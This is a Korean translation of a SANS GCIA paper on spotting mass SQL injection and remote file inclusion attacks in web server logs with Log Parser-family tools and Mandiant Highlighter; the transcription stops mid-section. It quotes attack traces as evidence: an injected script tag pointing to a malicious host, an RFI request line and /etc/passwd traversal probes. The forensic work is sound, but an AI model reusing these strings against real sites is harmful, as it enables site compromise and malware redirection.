웹로그분석을통한공격자식별방법 GIAC GCIA 골드인증 작성자 : Russ McRww, 자문 : Kees Leune 승인 : 2011 년 11 월 16 일 한글본승인 : 2015 년 6 월 5 일 요약관심을가지고웹로그를분석하

Size: px
Start display at page:

Download "웹로그분석을통한공격자식별방법 GIAC GCIA 골드인증 작성자 : Russ McRww, 자문 : Kees Leune 승인 : 2011 년 11 월 16 일 한글본승인 : 2015 년 6 월 5 일 요약관심을가지고웹로그를분석하"

Transcription

1 SANS Institute InfoSec Reading Room 이보고서의영문은 SANS 연구소 Reading Room 사이트에있는것이며, 한글본은 ITL TechNote 사이트에있는것입니다. 이 보고서는문서로허가되지않고서는다른곳에재게시할수없습니다. 웹로그분석을통한공격자식별방법 관심을가지고웹로그를분석하면많은것을알수있다. 본페이퍼에서는이것을인터넷백그라운드방사 (IBR) 라는학술용어의한부분으로저자가인터넷백그라운드공격 (Internet Background Abuse) 이라고정의한다. 스캐닝과잘못된구성을포함한 IBR 스펙트럼의두부분은공격자와피해자가손쉽게. 저작권 SANS 연구소한글본저작권 SANS 코리아작성자가모든권한을가지고있음 2015 SANS 코리아 / ITL 1

2 웹로그분석을통한공격자식별방법 GIAC GCIA 골드인증 작성자 : Russ McRww, russ@holisticinfosec.org 자문 : Kees Leune 승인 : 2011 년 11 월 16 일 한글본승인 : 2015 년 6 월 5 일 요약관심을가지고웹로그를분석하면많은것을알수있다. 본페이퍼에서는이것을인터넷백그라운드방사 (IBR) 라는학술용어의한부분으로저자가인터넷백그라운드공격 (Internet Background Abuse) 이라고정의한다. 스캐닝과잘못된구성을포함한 IBR 스펙트럼의두부분은공격자와피해자가손쉽게사용할수있는패턴에대해상세히알리는인터넷백그라운드공격에적용할수있다. 이문서에서는구체적인웹애플리케이션예제를통해공격자와피해자의관점으로부터특성, 트랜드와경향이드러나는공격분석방법및도구사용법에대해다룬다 SANS 코리아 / ITL 2

3 1. 소개 관심을가지고웹로그를분석하면많은것을알수있다. 본연구보고서에서는이것을인터넷백그라운드방사 (IBR) 라는학술용어의한부분으로인터넷백그라운드공격 (Internet Background Abuse) 이라고정의한다. 이문서에서는도구사용옵션과인터넷백그라운드공격 (IBA) 을집중분석할예정이다. IBR은세부분으로나뉠수있다 : 스캐닝, 후방산란및설정오류이다 (Pang, Yegneswaran, Barford, Paxon & Peterson, 2004). 인터넷백그라운드공격에스캐닝과설정오류초점을맞춰적용하면, 스캐닝밴드에서공격자의패턴상세사항을알수있으며, 구성오류밴드에서피해시스템의특성에대한관련정보가노출된다. 본문서에서는 holisticinfosec.org 웹사이트등을대상으로한대량 SQL 인젝션과원격파일포함 (RFI) 웹애플리케이션공격과같은두개의주요공격방식을다룬다. 이문서는공격자와피해자의관점으로부터드러나는특성, 트랜드, 성향과함께인터넷의가장취약한부분을통해귀중한정보를찾아쓰레기통을뒤지는것과유사하다. The Web Application Hacker s Handbook에서정의된 SQL 인젝션은공격자가조작된값을입력하여백엔드데이터베이스와상호작용하는애플리케이션을방해하여데이터베이스서버에애플리케이션또는논리적간섭과명령어를실행하여임의의데이터를검색할수있는취약점이다 (Stuttard, Pinto, 2008). 대량 SQL 인젝션은자동화된 SQL 인젝션공격기법을이용해서몇천또는몇만시스템이짧은기간 ( 일, 주 ) 안에해킹된다. 원격파일포함 (RFI) 공격은 URL을명세하여파일포함취약점을공격하는방법이다. 일부스크립트언어는하나의공통된 API를활용하여로컬파일을열고, 원격 URL을불러오는데여기서공격자가제어하는서버에서파일을검색하는것을통해공격을하는것이다. 나중에데이터가처리되는방법에따라서는피해서버를완전히제어할수있다 (Zalewski, 2012). 특정공격속성에대한웹로그를프로그램적으로파싱후에, 공격및피해사이트를분석하면, 공격자의지리적인위치특징, 피해사이트의공통적인결함및피해분석동안에추가적으로공격가능한발견사항에대한패턴들이드러난다. 준비된로그한세트를이용해서어떤사이트는스캐닝등공격시도만있었고, 어떤사이트는공격이성공하여소스 IP 주소를확인할수있다. 이러한발견사항을통해추가적인공격자의사이트와행위와관련된특정정보를알수있다. 최근신문헤드라인에보복적인해킹단체가개인식별정보와민감한정보를해킹하였다는것을보면공격자의자동화된방법을통해보안설정오류가쉽게발견되어해킹되었는지를이해하는것이굉장히중요하다. 원격파일포함 (RFI) 공격등 2015 SANS 코리아 / ITL 3

4 의희생자가되는피해사이트는추가적인웹애플리케이션보안결함및권한오류로인해공격자는해킹후스캐닝역량을확대하고, 피해를확산시킬수있다. 인터넷백그라운드방사리비지티드 (Internet Background Radiation Revisited) 에서논의된학술연구와개념을발전시켜, 이문서는파싱및분석기법과공격자와피해자메트릭과관계된조사방법을다룬다. 도구및실제사례를통해독자들이탐지조치를위해자신들의로그를대상으로사용할수있는방법을배워공격을완화할수있다. 2. 인터넷백그라운드방사및공격 2.1 인터넷백그라운드방사 인터넷백그라운드방사 (IBR) 라는용어는 2004년도에 Characteristics of Internet Background Radiation(Pang, Tegneswaran, Barford, Paxson & Peterson, 2004) 에서처음소개되었다. 이연구는할당되지않은 IP 공간으로가는가치가없는트래픽을분석하기위해과학적으로접근했다. 저자는 백그라운드방사 를후방산란플러딩, 취약점스캔, 웜또는보안설정오류로인해만들어지는무해한트래픽으로구성되는것이라고정의하였다. 인터넷백그라운드방사리비지티드라는추가연구보고서에서는많은비정형적인행위를주소공간의오염으로보고, 보안설정오류를훨씬더많이연구하였다. 비정형행위는종종 네트워크프로토콜취약점, 네트워크서버, 기기, 서비스설정오류, 공격도구설정오류, P2P 네트워크설정오류및다양한다른소프트웨어프로그래밍버그 의결과로언급되었다 (Wustrow, Karir, Bailey, Jahanian & Huston, 2010). 2.2 인터넷백그라운드공격 두개의연구에서악의적인트래픽뿐만아니라, 네트워크서버와서비스설정오류및공격도구설정오류에의해서발생되는할당된 IP 공간으로가는비생산적인트래픽과비정형적인행위를통합할수있는요소들이도출될수있다. 자동화공격을통해전파되는대량 SQL 인젝션공격과 RFI 공격의유사한점을고려할때, 이러한공격은인터넷백그라운드공격으로정의될수있다는것을알수있다. 더간단히설명하면웹애플리케이션으로가는특정한양의트래픽은간단한및지속적인공격적이다. 이문서에서설명하듯이이러한공격은비교적쉽게측정되고분석될수있다. 이문서가작성되는도중에배포된최 2015 SANS 코리아 / ITL 4

5 근의 Imperva 연구는이주장을입증했다. Imperva의 Hacker Intelligence Initiative, Monthly Trend Report #9 Automation of Attacks 에서자동화된 SQLi 및 RFI 공격과관련된구체적인통계를보여준다 (Imperva, 2012). 이논문에서는데이터가드러나고, 그결과에서방어적인블랙리스트를만들수있지만, 방법론에관해서는언급되지않았다. 단순한통계를언급하는것보다본연구는방법론및도구를통해유사한분석을수행하고, 웹로그에서이러한통계를도출하한다. 대량 SQL 인젝션과 RFI 공격은인터넷백그아운드공격의주요기여자임에틀림없다. 3. 공격샘플링및분석 3.1 대량 SQL 인젝션공격 최근의 Lilupophilupop과 Nikjju 공격은둘다현재대표적인대량 SQL 인젝션공격의사례이다. Lilupophilupop 공격은 SANS Internet Storm Center Diary에서 Mark Hofman에의하여지난 12월에자세하게잘설명되었다 (Hofman, 2011). 추가적으로 Mark의분석이외에, 이글에는공격을당하고언급한독자들이많은코멘트와답을달았으며일부는로그샘플을제출하였다. 대부분의독자들은 LizaMoon 공격을기억할것이다 ; Lilupophilupop 공격도꽤비슷하다. 두가지의사건에서인젝션된사이트는가짜백신을제공하는곳으로이동하도록리다이렉션하는 URL을제공하였다. 특히, 해킹된사이트에 </title><script src= hxxp://lilupophilupop.com/sl.php ></script> 가포함되어있었으며, sl.php가피해자를 hxxp://ift72hbot.rr.nu와같은곳으로반사시켜악성 AV 사이트로가도록하였다. rr.nu의최상위도메인은몰도바공화국이며, 심각한스팸캠페인뿐만아니라, WordPress 해킹과연루되어있다. 그림 1은전형적으로해킹된것을보여주는피해사이트이다 SANS 코리아 / ITL 5

6 그림 1: Lilupophilupop 피해사이트 피해사이트는대부분 IIS, MS-SQL서버에 ASP, ASP.net 및 ColdFusion이실행되고있었다. Lilupophilupop 공격의특성을파악할수있는것은 IIS 로그에서눈에띄는큰 hex 값이포함되어있다는사실을알았다. 이 hex 내용은다음섹션에서좀더자세히설명할것이다. 이문서의목적을위해포함된 ISC 다이어리독자가제출한 Lilupophilupop 공격로그샘플을이용하여다양한도구로분석할것이다. 이것은자주 D:\logs\lilupophilupop\ex111291anon.log로언급된다 Log Parser Log Parser는마이크로소프트제품으로 IDS, NetMon 등뿐만아니라 Exchange Server 와 IIS 로그, 윈도우서버이벤트로그의로그파일을분석할수있다. Log Parser는 IIS의로깅메커니즘을시험하기위해 2000년에개발되었다. 복잡하고전문성을띈업무를지원하기위해 Log Parser는 SQL 언어의매우제한된쿼리 를포함하여업데이트했다 (Giuseppinni & Burnett, 2004). 만약시스템 PATH 변수에추가되면, Log Parser는간단하게설치되고명령프롬프트로도잘작동한다. 쿼리는 SQL과같으며간단하게될수도있다. 위에서언급한 ex111201anon.log 로그로에러메시지를뽑아내기위해쿼리는다음과같다 : SELECT EXTRACT_TOKEN(c-ip, 0, ' ') AS IP, EXTRACT_TOKEN(FullUri, 0, ' ') AS Uri, EXTRACT_TOKEN(csuriquery, -1, ' ') AS ErrorMsg, COUNT(*) AS Total USING STRCAT( cs-uri-stem, REPLACE_IF_NOT_NULL(cs-uri-query, STRCAT('?', cs-uri-query))) AS FullUri FROM D:\logs\lilupophilupop\ex111201anon.log WHERE (sc-status = 2015 SANS 코리아 / ITL 6

7 500) AND (cs-uri-stem LIKE '%.asp') AND (ErrorMsg LIKE %lilupophilupop%') GROUP BY IP, Uri, ErrorMsg ORDER BY Total DESC TO errorresults.log SQL 인젝션공격을분석할때 HTTP 프로토콜 500번오류 ( 내부서버오류 ) 인웹로그를확인하는것이유익하다. HTTP 프로토콜 500번에러는 SQL 인젝션공격에의해생긴조사경로를바르게잡은것이다. a.sql 파일로저장된위의쿼리는다음과같은명령을실행하면, 출력값은 TSV 포맷으로저장된다. logparser -o:tsv file:asp_app_errors_lilupophilupop.sql IIS 로그의분석할때쿼리의몇몇주요엘리먼트를이해하는것이중요하다. 이쿼리에서나타나는 IIS 로그필드는 request를받는프록시서버나클라이언트의 IP 주소 (c-ip), 서버의접근된리소스 (cs-uri-stem), URI의쿼리문자열부분내용 (cs-uri-query), 그리고클라이언트가받는결과코드 (sc-status) 를포함한다. 사용자나프록시서버를확인할수있는 c-ip, 공격범위를확인할수있는 cs-uri-stem, 악의적인데이터의삽입을확인할수있는 cs-uri-query, 그리고 CGI 스캔, SQL 인젝션, 다른침입을확인할수있는 sc-status는포렌식관점에서유용한것들이다 (Burnett, 2010) Log Parser Lizard Log Parser Lizard(LPL) 은 1998년에 Lizard Lab을설립한개발자이자마케도니아소프트웨어엔지니어인 Dimce Kuzmanov의아이디어다. Dimce는 ISSA 저널에서 2012년 4월의툴스미스칼럼을위한이메일인터뷰에서발견한많은정보를제공했다 (McRee, 2012) 년에또한금융시스템의시스템관리자로서파트타임으로일하고있을때, Log Parser를이용하여일일기반으로보고서를만들고, 로그를분석하고, 에러리포팅을자동화하고 txt 파일과함께데이터를전송하였다. 시간이지나면서수많은쿼리가처리및유지하기힘들어졌고, 스스로가무료소프트웨어로부터혜택을받았기때문에, 그는개인적인용도를위한 LPL을만들었고, 커뮤니티에돌려주기위해유용한프리웨어제품으로발표하길원했다. LPL이성공적으로 Log Parser 의기능을잘이용함에따라, 개발자는 LPL을이용해서훌륭한 UI로학습과적은노력으로쿼리를구성할수있었다. LPL에 log4net과정규식입력지원이추가되면서 Log Parser 커뮤니티는 LPL을받아들이기시작했다. 이따금발생하는 LPL 릴리즈는보통약간의새로운기 2015 SANS 코리아 / ITL 7

8 능과버그또는코드를수정하는것을기본으로하고, 향후버전은계획되었으나, 주기적으 로발표되지않는다. 오늘날 LPL 은지난 3 년동안트랜드분석에기초로하여한달에약 2000 건설치와거의전세계적으로 80,000 명의사용자를가지고있다. LPL 의최근제품릴리즈는 2.1 이고다음과같은기능을포함하고있다 : - 소스검색및분석기능, 신택스 (Syntax) 하이라이팅기능, 자동소스코드완성, 메소드인사이트언두 / 리두, 북마크등소스코드편집기능을강화하여쿼리구성기능 - 페이스북쿼리언어 (FQL) 지원. 이기능은페이스북개발자들이그들의쿼리를관리하는것을돕기위해도입되었다. - 코드정보 ( 코드템플릿 ) 와정수. Log Parser Lizard는또한마이크로소프트. Net에서의 static/shared 특성을묶은 constants 를지원한다. - 마이크로소프트오피스설치를요구하는것없이차트를지원할뿐만아니라필터링과그룹핑과개선된그리드등다양한사용자인터페이스기능 - 등록된사용자에게엑셀과 PDF 문서로결과를내보내고인쇄하는것을지원한다. - LogParser SQL 쿼리를만들수있는인라인 VB.net 코드를지원한다. - 인라인 VB.net 지원으로인해 <% 와 %> 기호사이에코드를떨어뜨릴수있다 ; 즉 VB.net이실행되고, 결과문자열은쿼리에서위치한다. Lizard Labs은이기능이 LPL 사용자들을위해매우유용하다고생각하고있다. 로그를파싱하기전에당신은파일을이동-복사- 이름바꾸기, FTP를통해다운로드, IIS 중단등을할수있다. 당신은또한쿼리파라미터에서산술연산및시스템환경설정을위한 DateTime과같은.NET 데이터타입을사용할수있다. 본연구에서는 LPL 2.5 베타버전을이용하였다. 이버전의새로운기능은다음과같다. - 필수정보를확인하기위해조건부의필드포맷 ( 색깔, 글꼴, 크기, 이미지 ). 예를들면, 당신은에러 (error) 색깔은빨간색, 경고 (warning) 색깔은노란색등으로조건을변경해서설정할수있다. 또는만약흥미로운문자열의값을포함한다면특정필드를강조한다. - 데이터베이스스토리지가허용하는검사, 백업, 감사뿐만아니라조직의다중사용자와컴퓨터들사이에용이성을위한 SQL 서버데이터베이스안에서쿼리를저장하고만들수있다 SANS 코리아 / ITL 8

9 - 엑셀스타일의열필터링 - 엑셀스타일 ( 대부분의엑셀기능 ) 함수와칼럼을추가하고엑셀 2007 포맷 (65365 열 이상 ) 에서의내보내기를지원기능 향후 LPL 에는 IIS 웹보고서 ( 다른상용로그분석제품등 ) 를위한비정형쿼리, 쿼리실행스케줄링지원, LPL으로부터이메일을통해보고서를받고, 명령어라인지원, 쿼리빌더도구, 텍스트파일입력값포맷 ( 하나의파일이어디있든지하나의레코드와필드는 LogParser 함수나 RegEx와함께뽑아낼수있다 ), 그리고 log4net 입력값포맷개선하는기능이추가될것이다. 다시, ISC 독자들이제출한위에서언급된로그파일을이용하여 LPL에포함된기본쿼리로부터 ASP 애플리케이션에러를찾기위해쿼리를만들었다. LPL을실행하기위해, ASP App Errors에서 IIS Logs를클릭하고, FROM 구문에있는 #IISW3C# 이타겟로그파일경로로대체하고, 그림 2에서보여지는것과같이 Run Query를클릭한다. 로그파일이필요하면저자의이메일주소 ( 푸터에서 ) 를통해요청하면시험해볼수있다 ( 이메일주소 : russ@holisticinfosec.org) 그림 2: LPL 파싱에러메시지 Lilupophilupop 이나 URL 인젝션에대해서사전에지식이없어도, FROM D:\logs\lilupophilupop\ex111201anon.log WHERE (sc-status = 500) AND (cs-uri-stem LIKE '%.asp') 이포함된이쿼리는즉시검색벡터를좁혀준다. 또한이공격에서공통점은로그에서보이는 DECLARE 선언 ( 변수정의 ) 이될수도있다 SANS 코리아 / ITL 9

10 그림 3 에서보여주는쿼리는 CAST( 하나의데이터타입표현을다른것으로변환 ) 선언뒤에 DECLARE 선이이포함된세개의결과가나왔다. 여기서벡앤드로 hex 값을전달하기위한 시도가있었다는것을알수있다. 그림 3: LPL 파싱으로나온 DECLARE 선언 의결과에서알수있듯이큰 hex 문자열이분명하다. LPL 사용자들은 SELECT ALL을선택하고그리고 COPY, 그리고텍스트편집기에내용을붙여넣기할수있다. CAST 선언바로뒤부터 AS VARCHAR 선언앞까지의 Hex를복사하여, Burp Suit 디코더창안에붙여넣기하고아스키 hex로디코딩을선택한다 (Stuttard, 2011.). 파이어폭스애드온인 HackBar도 hex 디코딩기능을제공한다. 그림 4는변환된공격문자열을보여준다. 그림 4: hex 를변환한 Burp 디코더 2015 SANS 코리아 / ITL

11 Lilupophilupop 공격은 모든 테이블 안에 모든 칼럼을 통하여 순환하면서 hxxp://liupophilupop.com/sl.php 지점으로 자바스크립트를 추가하여 자신들의 값으로업데이트시도한다. 짧은시간안에 LPL과약간의경험을가지고공격패턴이명확하게확인되고 분석되었다. 이것은섹션 3.1.1에서도언급했듯이이결과는 Log Parser 명령어라인에서도 수행될수있다. 하지만 LPL을이용하면강력한쿼리관리기능과차트가포함된잘정돈된 보고서를만들수있는등편리하다. The Computer Forensics and Incident Response 블로그에서포스팅한 Computer Forensics How-To: Microsoft Log Parser(Tilbury, 2011) 은 Log Parser Lizard 사용시훌륭한참고가된다 Log Parser Studio Log Parser Studio 는라이브러리쿼리관리기능을업데이트 ( 많은유용한빌트인 쿼리들을포함하여 ) 하여동시에 100 개이상의쿼리를실행하는기능을추가하고 Log Parser Lizard 가현재분석할수없는몇몇사용자정의로그타입을위해지원하는기능을 추가하였다. Log Parser Studio 는또한배치작업및자동화가가능하다. 설치및사용은간단하다. 설치가되면, 폴더아이콘 ( 쿼리의로그파일 / 폴더선택 ) 을 클릭하고분석대상로그파일을선택한다. D:\logs\lilupophilupop\ex111201anon.log 로 계속하면, Log Parser Studio 를이용해서봇이나자동프로그램이사용되었는지알기위해 공격한소스 IP 주소로부터사용자에이전트개체를분석하였다. Log Parser Studio 라이브러리에서사용자들은 IIS 로그에대해 IIS: User-Agent Report 등많은쿼리가 준비되어있다. ex111201anon.log 를대상으로 SELECT distinct cs(user-agent), count(*) as hits FROM [LOGFILEPATH] GROUP BY cs(user-agent) ORDER BY hits DESC 쿼리를실행하면, 1,766 개의서로다른사용자에이전트문자열이나온다. 이결과는 Lilupophilupop 공격에관계된것과는반대로모든로그전체에대한것으로, 노이즈 - 신호 비율을향상하기위해쿼리를수정하였다. 사용자에이전트와관련하여널 (Null) 사용자에이전트문자열을찾는쿼리도있다. 앞에서해본것처럼 500 번에러를검색하는것과같이하면, 결과는공격이나타난다 ; 이 경우는명확한 Lilupophilupop 공격이다. SELECT * FROM [LOGFILEPATH] WHERE cs(user-agent)=null AND sc-status=500 으로부터의쿼리결과는그림 5 에서 보여지는것과같다 SANS 코리아 / ITL

12 그림 5: 널사용자에이전트를통해발견된 Lilupophilupop 대량 SQL 인젝션분석과통계대량 SQL 인젝션공격을하면대규모의피해가발생한다. Lilupophilupop 공격의절정후 2012년 1월 15일에도여전히 1,170,000 사이트가해킹되었다. 그러나검색엔진쿼리를통해수집된통계이기때문에, 직접적으로해킹을나타내는것보다 Lilupophilupop 에대해참고를포함하는결과일가능성을반드시고려해야한다. 이벤트의홀수차례에, 그림 6에서보여지는것처럼 Lilupophilupop 피해의국가통계에서, 네덜란드가최고국가로나타난다. 그림 6 왜 55만개이상의결과에네덜란드에속해있는지는명확하지않지만수많은하위도메인이있는단하나의도메인이해킹되었으며, ></title><script src= hxxp://lilupophilupop.com/sl.php ></script> 가데이터베이스에서광범위하게쓰였고그래서과도하게페이지카운트가포함되었다. 이이론을지원하는예제는 2012년 5월 9일에남아있다. 그림 7에서보여지는것처럼도메인 vakantieland.nl은서브도메인뒤에서브도메인과함께쌓여지고 Lilupophilupop 문자열이삽입된많은레퍼런스를보여주었다 SANS 코리아 / ITL

13 그림 7: 공격문자열에서의 NL 결과 제대로관리되지않는 ASP 프로그램은확실히대량 SQL 인젝션공격을쉽게당할 수있다. 그림 8 과같이않는 Air Free Tires( 와같이 사이트는타이어쇼핑사이트로추천하지않는다고하는것이안전하다. 그림 8: ASP 플랫타이어 이는 ASP만의문제는아니며, ColdFusion 사이트는또한쉽게피해를당했다. 2012년 5월 9일까지 ></title><script src= ></script> ext:cfm을포함하는검색퀴리에서여전히나타난다. Lilupophilupop에피해를입고있다는직접적인증거가있는사이트들이없지만, 피해사이트중의하나의조작된 request로인해다른오류에서 2015 SANS 코리아 / ITL

14 SELECT L.MetaDescription, L.MetaKeywords FROM Laender L WHERE LandID=1 이라는결과가나왔다. 이것은 SQL 인젝션취약점이있다는말이다. ASP.net 또한잊지말자. JS/Redirector 탐지로나오는 URL로인해여전히그림 9에서보여지는것처럼 JS/Redirecto 로탐지되었다. 그림 9: Lilupophilupopped forum.viverjsb.com에대해서소스코드검토결과, HTML HEAD 요소뿐만아니라많은 TABLE과 SPAN 레퍼런스에서 Lilupophilupop 문자열이인젝션되었다. 이것은대량 SQL이인젝션된사이트에누가방문하는지는토론해볼가치가있다. Lilupophilupop과 Nikjju 공격은둘다피해자들에게백신제공을속이는것이다. Nikjju 공격 ( 계속해서진행중임 ) 은다수의도메인을포함하고있으며, 잘문서화된 Lizamoon 공격을수행한동일단체의소행이다. 모든 Nikjju 도메인은 AS42926 또는 Radore Hosting 부분으로 를가르킨다. 이부분은다시논의될것이다. 이단체에서생성하고, 대량의 SQL 인젝션을통해인젝션된공통 URL *.com/r.php가반드시포함하고있다 (Danchev, 2012). 그림 10에서보여주는검색결과와같이공격자를검색해본결과 로나온다 SANS 코리아 / ITL

15 그림 10: 대량 SQL 인젝션피해자로부터리다이렉트된가짜백신 제공된바이너리를다운로드하여바이러스토털에서분석하면예상되로 Crypt.XPACK/Kryptik( 가짜백신 ) 으로탐지되었다. 바이너리를호스팅하는도메인 failsafetyperfomancecenter.info과 on-linelowcustodian.info의조회는각각 과 의 IP 주소가나온다. 이 IP에대해서검색쿼리해보면 Russian Business Network의한부분으로, 블랙리스트에포함된동유럽악성코드전파자로나온다 의경우는 urlquery를통해알수있듯이 (urlquery, 2012), AS42926 Redora Hosting에속한다. 3.2 Remote File Inclusion 공격 또다른최근 Imperva 연구인 Hacker Intelligence Initiative, Monthly Trend Report #8 Remote and Local File Inclusion Vulnerabilities 101은 해커들이좋아하는 원격파일포함 (RFI) 공격에대한상세내용을제공한다 (Imperva, 2012). 이 Imperva 보고서는 RFI( 와 LFI) 공격의해부, 진화뿐만아니라완화방법도논한다. Imperva 연구와동일한발견사항을논하는것보다, 여기에는 RFI 공격에대한구체적인내용을다룬다. 공격및피해애플리케이션둘 2015 SANS 코리아 / ITL

16 다관련있는통계데이터를생성하면서구체적인방법을이용해서 holisticinfosec.org 를 대상의해킹공격을분석한다. 초점은다시웹로그로부터모든정보를수집하여인터넷 백그라운드공격활동을분석한다 하이라이터 (Highlighter) 맨디언트는 RFI 공격분석을위한완벽하고, 분석가가패턴을파악할수있도록설계된로그분석그래픽구성요소를제공하는로그파일분석도구인하이라이터 ( 하이라이터 ) 1.1.3을제공한다. 개발자들에따르면, 하이라이터는분석가들이무관한데이터와관련데이터를분별할수있는많은기능을제공한다. 로그검토방법을향상시킬수있는새롭고흥미로운방법은굉장히가치있으며, holisticinfosec.org 로그자료는 RFI 공격에대해서하이라이터도구를시험해볼수있는최상의탐지시나리오로입증되었다. 하이라이터는주로보안분석가및시스템관리자를위해설계된무료유틸리티로서분석하는동안에로그데이터에대해세가지관점을제공한다 : 1. 텍스트보기 : 사용자가흥미있는키워드를강조하고 안전한 콘텐츠를필터링할수있다. 2. 그래픽, 전체내용보기 : 사용자가인터페이스를통해동적으로수정할수있는이미지로렌더링되는모든콘텐츠와파일의전체구조를보여준다. 3. 막대그래프보기 : 다른텍스트뷰어 / 편집기에서사용할수없는것과는달리유용한메타데이터로시험관을제공하고사용패턴은시각적으로분명하게되는시간이지남에따라파일에서패턴이표시된다. 하이라이터프로젝트개발자인제드미튼과제이슨러트젠츠는이연구를위해하이라이터의세부사항을제공했다. 하이라이터 1.0은 2009년도에세인트루이스의 DC3에서거의모든기능과함께처음발표되었으며, UI는내부 ( 즉맨디언트 ) 피드백에의하여만들어졌다 버전은몇몇버그리포트를제출한맨디언트포럼사용자로부터많은도움을받았다. 제이슨과제드는긴밀히협력하면서가능한업무시간이끝난후자유시간에하이라이터를개발하하였다. 제드는그가좋아하는큰파일리더중의하나로서이벤트로그 ( 윈도우이벤트등 ), 메모리덤프에서텍스트출력값 ( 특히, 메모리이미지에서 ASCII 출력값 ) 을조사하는데사용하는등상당히평범하게하이라이터의사용법을설명한다. 큰파일리더인하이라이터는필요에따라수백 MB 파일을보기위해디스크로부터읽지만이로인해메모장, NP++, 텍스트패드등이다운된다. 제드의새로운 2015 SANS 코리아 / ITL

17 사용사례는웹로그에서초기악성 IP 주소를발견하고공격자가노리는파일을알아내고, 하이라이트개요패널을관찰하여이전에알려지지않은악의적으로행동하는사람을추가적으로발견하는기능을사용하는것이다. 하이라이터개발로드맵은사용자커뮤니티에서주도를한다. 향후에는강조하는다중문서 ( 여러문서에대한하나의압권세트 ) 하이라이팅기능을포함하는것이다. 개발자는다음두가지중하나가구현되는것을보고싶어한다 : 1. 바이너리읽기, 임의의날짜형식, 임의의로그형식을구현하거나 2. 프레임워크구현 / 통합하여커뮤니티에서하이라이터의다양한기능을추가할수 있는플러그인을개발할수있도록하는것 설치는맨디언트하이라이터 msi를실행하고, 기본설정값을따르면된다. 패턴인식은하이라이터의핵심기능으로, 데이터를필터링하고축소하는동안데이터가강조하는흥미로운면을강조한다. 이연구를위해 2011년 6월부터 2012년 4월까지의 HolisticInfoSec.org의웹로그를이용하여 1,091,692 로그라인을유용한공격유형으로줄이는방법을시연한다. 하이라이터는.log,.txt와.csv 등텍스트파일과함께사용하도록설계되었다. 모든로그파일의내용을클립보드로복사하고 File -> Import from Clipboard 클릭또는 File -> Open -> File 을선택하고, 선택한로그파일을선택한다. 하이라이터는또한 Mandiant Intelligent Response(MIR) 에의해만들어진문서와함께동작한다 ; 상용제품사용자는또한하이라이터가가치있다는것을알수있다. 로그파일이로드되면, 하이라이터사용을위한오른쪽마우스컨텍스트메뉴가기본적인기능드라이버가된다. 한번설치되면, 하이라이터사용자가이드 PDF 파일은시작메뉴에서 Mandiant -> Highlighter 아래에포함된다. HolisticInfoSec.org 로그들은현재사용되는색깔 ( 하이라이터가의도된 ) 에서 RFI 공격을포함한예상되는모든웹애플리케이션공격시도를나타낸다. 공격들이모두이곳에서밝혀질것이다. RFI 공격을분석하는동안공격자들은공격시도과정에서공통인클루드 (include) 파일을이용하는것이명백하게드러난다. 일반적인예는 fx29id1.txt이며전형적인로그항목은다음과같다 : [14/Aug/2011:20:30: ] "GET ////////accounts/inc/include.php?language=0&lang_settings[0][1]= HTTP/1.1" "-" "Mozilla/5.0" 2015 SANS 코리아 / ITL

18 holisticinfosec.org-aug-2011.log는하이라이터에서로드되고, fx29id1.txt는키워드검색필드에서쿼리되었다. 여덟줄이탐지되었다. 그림 11에서보여지는것과같이그래픽보기로결과들이강조된텍스트를스크롤하고텍스트보기를정렬할수있다. 그림 11: 강조된 RFI 키워드 여덟개의항목각각검토한결과, 각각의로그에 HTTP 404 에러코드가로그로남아있는것을보니 RFI 시도가실패한사실을확인하였다. 또한여덟개의항목은모두 으로부터왔다. 따라서 은강조되었고마우스오른쪽이클릭되었고 Show Only가선택되었다. 이결과는 을포함한전체에서 15개의항목만볼수있도록제한한다. Jed가대부분설명하였듯이, 으로부터다른불법행위가발견되었을뿐만아니라, 다른 IP들로부터다른유사한공격패턴이있다. 또다른마우스오른쪽클릭한후 Pre-Defined -> Apache Log 다음에 Field Operations -> Set Delimiter를선택하였다. 마지막으로마우스오른쪽을클릭하여 Field Operations -> Parse Date/Time을선택하면그림 12와같이히스토그램을볼수있다 SANS 코리아 / ITL

19 그림 12: 시간별이벤트보여주는막대그래프 상관관계에대한또다른것에태그를붙이는동안에필드를강조하고싶은사용자는상단도구모음에서 Cumulative 체크박스를반드시선택해야한다. 가장최근의강조된세트에대해서강조된필드로이동하려면, 사용자는이전의 p 단축키와다음의 n 단축키를활용할수있다. 단축키는 File -> Edit Hotkeys를통해정의할수있고, 사용자가이드에잘정의되어있다. 강조된것을관리하기위해서는, 아마도누적되는강조된한세트를삭제할수있다. 이경우텍스트 UI에서오른쪽마우스클릭후 Highlights -> Manager를선택하면, 그림 13에서보여지는것처럼당신이삭제하길원하는하이라이트를체크한다. 그림 13: 하이라이터관리자 Imperva 의 Hacker Intelligence Summary Report Remote File Inclusion 에 2015 SANS 코리아 / ITL

20 설명하였듯이 많은 RFI 공격은다른공격벡터와함께상호배치되었다. 예를들어, 디렉토리추적은응용프로그램의 RFI 취약점을식별하는데사용되었다 (Imperva, 2011). 이러한사례는 Holisticinfosec.org 로그에나타나고하이라이터로발견될수있다. 하이라이터퀵을사용하여, <script>, select, union, onmouseover 등과같은키워드검색을통해 holisticinfosec.org 로그에대한크로스사이트스크립팅과 SQL 인젝션에대한간단한검사를실시하였다. 그러나거의발견되지않았다. 그러나 2011년 8월에대한 96,427개의로그에대해 /etc/password 키워드검색과관련된 10개의디렉토리추적시도가발견되었다. 이것은매우제한된쿼리이지만그것자체 ( 다른타겟기회는끝이없다 ) 로중요한점을증명하고있다. 디렉토리추적시도가성공하지않았다는것을확인하기위해서는, 이전의모든강조된것을삭제하고 Highlight 기능을사용한후처음발견된로그중에서 /etc/passwd%00을수동으로선택하였다. 강조된라인중하나를오른쪽마우스클릭하고 Show Only를사용하면예상된 10개의결과만을아래로 UI로줄여준다. Highlight 다음에마우스를끌어서 404 오류를선택하였다. 이 10개의모든항목이 404 오류만보여주고있다는것을확인할수있었다. 즉그림 14에서보여주는것과같이성공적인시도는없다. 그림 14: 하이라이터쿼리축소 대용량파일처리는하이라이터의강력한기능이다. 2.44GB Swatch 로그파일을로드할때, 파일로딩및형식화에약간의시간이걸렸지만하이라이터가성능저하를겪거나실패없이 24,502,412 로그항목을훌륭하게처리했다. 특정 inode에대한쿼리가실행되었고, 하이라이터는 10분안에 25만개이상의라인전체에 1,930번의히트수를태그하였다 RFI 추출물 SANS Internet Storm Center 침해사고대응가인 Rob Danford 는변조되지않은아파치 2015 SANS 코리아 / ITL

